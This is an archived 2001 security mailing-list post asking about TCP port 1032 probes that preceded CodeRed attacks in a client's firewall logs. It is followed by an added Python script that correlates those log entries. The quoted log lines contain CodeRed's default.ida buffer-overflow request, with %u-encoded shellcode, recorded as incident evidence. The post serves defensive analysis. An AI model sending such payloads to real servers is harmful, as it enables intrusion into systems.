hi,

Long time reader, first time poster... I've been asked to review some logs for a client, and I've discovered some strange entries that I've never seen before. I've searched on all places I know related to security and log analysis but found nothing...

The logs I got to analyze are from August 2001, and before some CodeRed entry I've a connection attempt on TCP port 1032... Here is a sample:

xxx.xxx.xxx.xxx : firewall that logged the entries
yyy.yyy.yyy.yyy : targeted machines
aaa.aaa.aaa.aaa : first CodeRed infected machine aiming at the client machine
bbb.bbb.bbb.bbb : second CodeRed infected machine aiming at the client machine

3Aug2001 18:37:25 N1004 xxx.xxx.xxx.xxx drop 1032 aaa.aaa.aaa.aaa yyy.yyy.yyy.yyy tcp 3 3463 len 48
3Aug2001 18:37:28 daemon xxx.xxx.xxx.xxx reject http aaa.aaa.aaa.aaa yyy.yyy.yyy.yyy tcp 3 3463 reason Content Security - access denied. resource http://yyy.yyy.yyy.yyy:80/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u 9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
5Aug2001 0:01:44 N1004 xxx.xxx.xxx.xxx drop 1032 bbb.bbb.bbb.bbb yyy.yyy.yyy.yyy tcp 3 3120 len 48
5Aug2001 0:01:49 daemon xxx.xxx.xxx.xxx reject http bbb.bbb.bbb.bbb yyy.yyy.yyy.yyy tcp 3 3120 reason Content Security - access denied. resource http://yyy.yyy.yyy.yyy:80/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000% u00=a

I've asked the owner of the targeted machine and none of his machines seem to use TCP port 1032 for their "normal" behavior (daemons or services). I've checked the aaa.aaa.aaa.aaa and bbb.bbb.bbb.bbb addresses and they come from an Internet provider.

At first glance, I'd say the attacking machines could have been trojanized, but why do the targeted ones systematically get such a 1032 connection attempt? To be honest I have no idea what it could be... If someone could give me any clue or a piece of help, that would be pretty cool...

regards,
john Huck

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
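One way to check the pattern the post describes across a whole log, rather than by eye: pair every dropped TCP/1032 probe with a rejected default.ida request from the same source a few seconds later, and list the 1032 probes that have no CodeRed request behind them (those are the ones that would not be explained by the worm). This is an added example, not code from the post or from the ARIS list; the field layout is read off the sample lines above, the addresses in the constructed sample are RFC 5737 documentation addresses, and the 60-second pairing window is an assumption.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the layout of the firewall lines quoted above (RFC 5737 addresses,
# CodeRed request truncated after the filler characters).
SAMPLE_LOG = """\
3Aug2001 18:37:25 N1004 192.0.2.1 drop 1032 198.51.100.7 203.0.113.5 tcp 3 3463 len 48
3Aug2001 18:37:28 daemon 192.0.2.1 reject http 198.51.100.7 203.0.113.5 tcp 3 3463 reason Content Security - access denied. resource http://203.0.113.5:80/default.ida?NNNNNNNN
3Aug2001 19:02:10 N1004 192.0.2.1 drop 1032 198.51.100.9 203.0.113.5 tcp 3 1200 len 48
5Aug2001 0:01:44 N1004 192.0.2.1 drop 1032 198.51.100.8 203.0.113.5 tcp 3 3120 len 48
5Aug2001 0:01:49 daemon 192.0.2.1 reject http 198.51.100.8 203.0.113.5 tcp 3 3120 reason Content Security - access denied. resource http://203.0.113.5:80/default.ida?XXXXXXXX
"""
# Field order as read from the sample: date time origin fw action service src dst proto rule sport [rest]
LINE_RE = re.compile(
    r"^(?P<date>\d{1,2}[A-Za-z]{3}\d{4}) (?P<time>\d{1,2}:\d{2}:\d{2}) (?P<origin>\S+) (?P<fw>\S+) "
    r"(?P<action>\S+) (?P<service>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<proto>\S+) (?P<rule>\d+) "
    r"(?P<sport>\d+)(?: (?P<rest>.*))?$")

def parse(line):
    """One log line -> dict with a datetime 'ts' and the rejected 'resource' URL (or None)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%d%b%Y %H:%M:%S")
    rest = rec["rest"] or ""
    rec["resource"] = rest.split("resource ", 1)[1] if "resource " in rest else None
    return rec

def correlate(lines, window=timedelta(seconds=60)):
    """Pair each dropped TCP/1032 probe with a default.ida HTTP reject from the same source
    within `window`. Returns (hits, orphans); orphans are 1032 probes with no CodeRed follow-up."""
    recs = [r for r in map(parse, lines) if r]
    hits, orphans = [], []
    for i, r in enumerate(recs):
        if not (r["action"] == "drop" and r["service"] == "1032" and r["proto"] == "tcp"):
            continue
        match = None
        for later in recs[i + 1:]:
            if later["ts"] - r["ts"] > window:
                break
            if (later["src"] == r["src"] and later["service"] == "http"
                    and later["resource"] and "default.ida?" in later["resource"]):
                match = later
                break
        if match is None:
            orphans.append(r["src"])
        else:
            hits.append({"src": r["src"], "dst": r["dst"], "probe_ts": r["ts"],
                         "gap_s": (match["ts"] - r["ts"]).total_seconds()})
    return hits, orphans
```

On the constructed sample, `correlate(SAMPLE_LOG.splitlines())` pairs the two probes that precede a default.ida request and reports the third source as an orphan.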
This archive was generated by hypermail 2b30 : Fri Nov 16 2001 - 14:39:54 PST